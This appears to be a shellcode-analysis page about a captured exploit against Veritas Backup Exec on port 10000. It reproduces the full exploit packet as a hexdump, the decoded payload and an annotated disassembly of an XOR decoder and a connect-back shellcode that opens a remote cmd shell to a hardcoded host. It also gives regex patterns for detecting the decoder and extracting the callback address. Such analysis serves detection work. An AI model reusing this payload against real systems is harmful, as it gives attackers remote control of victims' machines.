port: 10000
service:veritas backup exec
Reference: csni:shellcodes:konstanz:konstanz.bin
hexdump -C 62552a9adc236cee4228d0e7704797ab.bin 00000000 80 00 22 28 00 00 00 01 66 c9 34 12 00 00 00 00 |.."(....f.4.....| 00000010 00 00 09 01 00 00 00 00 00 00 00 00 00 00 00 03 |................| 00000020 00 00 02 00 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a |....ZZZZZZZZZZZZ| 00000030 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a |ZZZZZZZZZZZZZZZZ| * 00000220 5a 5a 5a 5a 00 00 20 00 59 59 59 59 59 59 59 59 |ZZZZ.. .YYYYYYYY| 00000230 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |YYYYYYYYYYYYYYYY| * 00000ed0 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 33 |YYYYYYYYYYYYYYY3| 00000ee0 c9 66 b9 05 01 e8 ff ff ff ff c1 5e 30 4c 0e 07 |.f.........^0L..| 00000ef0 e2 fa fd 68 e8 4b ed ff f8 f7 f6 6a 80 60 29 2a |...h.K.....j.`)*| 00000f00 84 55 2d 99 6f 11 6d 17 f8 93 56 02 90 43 3d 1f |.U-.o.m...V..C=.| 00000f10 f4 c3 11 6b a8 10 ae 27 c9 19 e9 b3 87 a8 ed 5a |...k...'.......Z| 00000f20 28 f1 fb 3f 32 f6 de c2 0c 6c 1d 12 4e df b6 61 |(..?2....l..N..a| 00000f30 1b 41 aa 24 c8 48 0e cd 18 54 48 a1 48 60 c6 c7 |.A.$.H...TH.H`..| 00000f40 23 74 4d 33 90 65 95 32 dc 18 69 d1 1b 50 d6 2e |#tM3.e.2..i..P..| 00000f50 43 cd ea 22 6b 3a 0d e8 29 66 85 3a 94 ba 5c b5 |C.."k:..)f.:..\.| 00000f60 09 23 17 1a 40 46 1d 01 04 4a 26 2e 84 ac 15 b5 |.#..@F...J&.....| 00000f70 92 7c ba d2 7c 52 da 0f 62 ee 08 67 83 8e d8 e4 |.|..|R..b..g....| 00000f80 8d 6f 41 fa 4a 9d 60 3b c0 67 4f c9 c8 cf ce dd |.oA.J.`;.gO.....| 00000f90 cc e3 f2 5d 73 cc 29 d9 26 a4 cf c2 ac d3 cb fd |...]s.).&.......| 00000fa0 26 51 24 da 5f 4d 1f d6 e0 47 6f d0 ab ed e8 41 |&Q$._M...Go....A| 00000fb0 6f a6 ab a6 a5 ac a6 ab ad 98 90 e3 07 45 2a a4 |o............E*.| 00000fc0 8b 59 33 e3 13 27 7f 43 5e 25 27 98 f6 22 9f f2 |.Y3..'.C^%'.."..| 00000fd0 52 9a d9 49 48 4f 8d 94 19 5b ff 15 9e c4 12 38 |R..IHO...[.....8| 00000fe0 b4 a7 a3 a3 a2 a5 9f f7 a6 a9 ac ab 04 2c 95 11 |.............,..| 00000ff0 31 e0 61 51 fc d2 fa d6 eb 06 59 59 b0 61 42 01 |1.aQ......YY.aB.| 00001000 e9 f3 fb ff ff 59 59 59 59 59 59 59 59 59 59 59 |.....YYYYYYYYYYY| 00001010 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |YYYYYYYYYYYYYYYY| * 000013d0 59 59 59 59 eb 06 59 59 d5 f8 40 01 e9 17 f8 ff |YYYY..YY..@.....| 000013e0 ff 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |.YYYYYYYYYYYYYYY| 000013f0 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 |YYYYYYYYYYYYYYYY| * 00002220 59 59 59 59 59 59 59 59 00 00 00 04 |YYYYYYYY....| 0000222c
Found konstanzbot XOR decoder, payload is 0x0106 bytes long. =------------------[ hexdump(0x1c18b5b0 , 0x00000106) ]-------------------= 0x0000 fc 6a eb 4f e8 f9 ff ff ff 60 8b 6c 24 24 8b 45 .j.O.... .`.l$$.E 0x0010 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 <.|.x... O.._ ... 0x0020 30 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 0I.4...1 .....t.. 0x0030 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 ......;T $(u.._$. 0x0040 eb 66 8b 0c 4b 8b 5f 1c 01 eb 03 2c 8b 89 6c 24 .f..K._. ...,..l$ 0x0050 1c 61 c3 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad .a.1.d.@ 0.@..p.. 0x0060 8b 40 08 5e 68 8e 4e 0e ec 50 ff d6 31 db 66 53 .@.^h.N. .P..1.fS 0x0070 66 68 33 32 68 77 73 32 5f 54 ff d0 68 cb ed fc fh32hws2 _T..h... 0x0080 3b 50 ff d6 5f 89 e5 66 81 ed 08 02 55 6a 02 ff ;P.._..f ....Uj.. 0x0090 d0 68 d9 09 f5 ad 57 ff d6 53 53 53 53 43 53 43 .h....W. .SSSSCSC 0x00a0 53 ff d0 68 8c 7f 81 0c 66 68 07 7f 66 53 89 e1 S..h.... fh..fS.. 0x00b0 95 68 ec f9 aa 60 57 ff d6 6a 10 51 55 ff d0 66 .h...`W. .j.QU..f 0x00c0 6a 64 66 68 63 6d 6a 50 59 29 cc 89 e7 6a 44 89 jdfhcmjP Y)...jD. 0x00d0 e2 31 c0 f3 aa 95 89 fd fe 42 2d fe 42 2c 8d 7a .1...... .B-.B,.z 0x00e0 38 ab ab ab 68 72 fe b3 16 ff 75 28 ff d6 5b 57 8...hr.. ..u(..[W 0x00f0 52 51 51 51 6a 01 51 51 55 51 ff d0 68 ef ce e0 RQQQj.QQ UQ..h... 0x0100 60 53 ff d6 ff d0 `S.... =-------------------------------------------------------------------------=
Using Konstanz-XOR
00402003 66:b9 0501 mov cx,105 00402007 e8 ffffffff call konstanz.0040200b 0040200b (ff)c1 inc ecx ; note: ff in parenthesis overlaps with previous instruction! 0040200d 5e pop esi 0040200e 304c0e 07 xor byte ptr ds:[esi+ecx+7],cl ; xor key is index 00402012 ^e2 fa loopd short konstanz.0040200e
Payload: Connectback createprocess shellcode.
00402014 fc cld 00402015 6a eb push -15 00402017 4f dec edi 00402018 e8 f9ffffff call konstanz.00402016 0040201d 60 pushad ; hash & check (edx) 0040201e 8b6c24 24 mov ebp,dword ptr ss:[esp+24] 00402022 8b45 3c mov eax,dword ptr ss:[ebp+3c] 00402025 8b7c05 78 mov edi,dword ptr ss:[ebp+eax+78] 00402029 01ef add edi,ebp 0040202b 8b4f 18 mov ecx,dword ptr ds:[edi+18] 0040202e 8b5f 20 mov ebx,dword ptr ds:[edi+20] 00402031 01eb add ebx,ebp 00402033 e3 30 jecxz short konstanz.00402065 00402035 49 dec ecx 00402036 8b348b mov esi,dword ptr ds:[ebx+ecx*4] 00402039 01ee add esi,ebp 0040203b 31c0 xor eax,eax 0040203d 99 cdq 0040203e ac lods byte ptr ds:[esi] 0040203f 84c0 test al,al 00402041 74 07 je short konstanz.0040204a 00402043 c1ca 0d ror edx,0d 00402046 01c2 add edx,eax 00402048 ^eb f4 jmp short konstanz.0040203e 0040204a 3b5424 28 cmp edx,dword ptr ss:[esp+28] ; found hash? 0040204e ^75 e3 jnz short konstanz.00402033 00402050 8b5f 24 mov ebx,dword ptr ds:[edi+24] ; edx: hash 00402053 01eb add ebx,ebp 00402055 66:8b0c4b mov cx,word ptr ds:[ebx+ecx*2] 00402059 8b5f 1c mov ebx,dword ptr ds:[edi+1c] 0040205c 01eb add ebx,ebp 0040205e 032c8b add ebp,dword ptr ds:[ebx+ecx*4] 00402061 896c24 1c mov dword ptr ss:[esp+1c],ebp ; ebp: addr 00402065 61 popad 00402066 c3 retn ; eax: addr 00402067 31c0 xor eax,eax ; ----------------------- 00402069 64:8b40 30 mov eax,dword ptr fs:[eax+30] 0040206d 8b40 0c mov eax,dword ptr ds:[eax+c] 00402070 8b70 1c mov esi,dword ptr ds:[eax+1c] 00402073 ad lods dword ptr ds:[esi] 00402074 8b40 08 mov eax,dword ptr ds:[eax+8] 00402077 5e pop esi 00402078 68 8e4e0eec push ec0e4e8e ; fn-hash 0040207d 50 push eax 0040207e ffd6 call esi ; find fn 00402080 31db xor ebx,ebx 00402082 66:53 push bx 00402084 66:68 3332 push 3233 00402088 68 7773325f push 5f327377 0040208d 54 push esp 0040208e ffd0 call eax ; loadlibrary() 00402090 68 cbedfc3b push 3bfcedcb 00402095 50 push eax 00402096 ffd6 call esi 00402098 5f pop edi 00402099 89e5 mov ebp,esp 0040209b 66:81ed 0802 sub bp,208 004020a0 55 push ebp 004020a1 6a 02 push 2 004020a3 ffd0 call eax ; wsastartup() 004020a5 68 d909f5ad push adf509d9 004020aa 57 push edi 004020ab ffd6 call esi 004020ad 53 push ebx 004020ae 53 push ebx 004020af 53 push ebx 004020b0 53 push ebx 004020b1 43 inc ebx 004020b2 53 push ebx 004020b3 43 inc ebx 004020b4 53 push ebx 004020b5 ffd0 call eax ; wsasocket() 004020b7 68 8c7f810c push 0c817f8c ; ip 004020bc 66:68 077f push 7f07 ; port 004020c0 66:53 push bx 004020c2 89e1 mov ecx,esp 004020c4 95 xchg eax,ebp 004020c5 68 ecf9aa60 push 60aaf9ec 004020ca 57 push edi 004020cb ffd6 call esi 004020cd 6a 10 push 10 ; len 004020cf 51 push ecx ; *sockaddr 004020d0 55 push ebp ; sock 004020d1 ffd0 call eax ; connect() 004020d3 66:6a 64 push 64 004020d6 66:68 636d push 6d63 004020da 6a 50 push 50 004020dc 59 pop ecx 004020dd 29cc sub esp,ecx 004020df 89e7 mov edi,esp 004020e1 6a 44 push 44 004020e3 89e2 mov edx,esp 004020e5 31c0 xor eax,eax 004020e7 f3:aa rep stos byte ptr es:[edi] 004020e9 95 xchg eax,ebp 004020ea 89fd mov ebp,edi 004020ec fe42 2d inc byte ptr ds:[edx+2d] 004020ef fe42 2c inc byte ptr ds:[edx+2c] 004020f2 8d7a 38 lea edi,dword ptr ds:[edx+38] 004020f5 ab stos dword ptr es:[edi] 004020f6 ab stos dword ptr es:[edi] 004020f7 ab stos dword ptr es:[edi] 004020f8 68 72feb316 push 16b3fe72 004020fd ff75 28 push dword ptr ss:[ebp+28] 00402100 ffd6 call esi 00402102 5b pop ebx 00402103 57 push edi 00402104 52 push edx 00402105 51 push ecx 00402106 51 push ecx 00402107 51 push ecx 00402108 6a 01 push 1 0040210a 51 push ecx 0040210b 51 push ecx 0040210c 55 push ebp 0040210d 51 push ecx 0040210e ffd0 call eax ; createprocess() 00402110 68 efcee060 push 60e0ceef 00402115 53 push ebx 00402116 ffd6 call esi 00402118 ffd0 call eax ; exitthread()
const char *pattern = "\\x33\\xC9\\x66\\xB9(..)\\xE8\\xFF\\xFF\\xFF\\xFF\\xC1\\x5E\\x30\\x4C\\x0E\\x07\\xE2\\xFA";
004020b5 ffd0 call eax ; wsasocket() 004020b7 68 8c7f810c push 0c817f8c ; ip 004020bc 66:68 077f push 7f07 ; port 004020c0 66:53 push bx 004020c2 89e1 mov ecx,esp 004020c4 95 xchg eax,ebp 004020c5 68 ecf9aa60 push 60aaf9ec 004020ca 57 push edi 004020cb ffd6 call esi 004020cd 6a 10 push 10 ; len 004020cf 51 push ecx ; *sockaddr 004020d0 55 push ebp ; sock 004020d1 ffd0 call eax ; connect()
const char *pattern = "\\xff\\xd0\\x68(....)\\x66\\x68(..)\\x66\\x53\\x89" "\\xe1\\x95\\x68\\xec\\xf9\\xaa\\x60\\x57\\xff\\xd6" "\\x6a\\x10\\x51\\x55\\xff\\xd0";
